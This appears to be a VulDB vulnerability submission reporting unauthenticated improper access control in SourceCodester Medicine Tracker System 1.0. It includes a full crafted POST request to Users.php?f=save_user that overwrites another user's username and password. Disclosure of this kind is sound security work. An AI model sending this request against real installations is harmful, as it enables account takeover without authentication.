| 제목 | Medicine Tracker System Improper Access Control |
|---|
| 설명 | An Improper Access Control has beed discovered in Medicine Tracker System. A remote and unauthenticated attacker can exploit this vulnerability by sending a crafted request, successful exploitation could allow attakers to change any users username and password.
The vulneravle URI is POST /php-mts/classes/Users.php?f=save_user. When the value of ' name="id" ' is correct, then an attacker could change the related username ,password and other informations. Cookie is not necessary for this operation, which means attackers could exploit it without authentication.
An malicous request is below
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
**********************************************************
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="id"
2
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="firstname"
a
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="middlename"
b
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="lastname"
c
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="username"
foo
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="password"
foo123
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z--
Then the relevant user with id=2 will be set as foo/foo123 |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html |
|---|
| 사용자 | WWesleywww (UID 43117) |
|---|
| 제출 | 2023. 03. 17. AM 09:18 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 17. PM 12:19 (3 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223311 [SourceCodester Medicine Tracker System 1.0 Users.php?f=save_user firstname/middlename/lastname/username/password 약한 인증] |
|---|
| 포인트들 | 20 |
|---|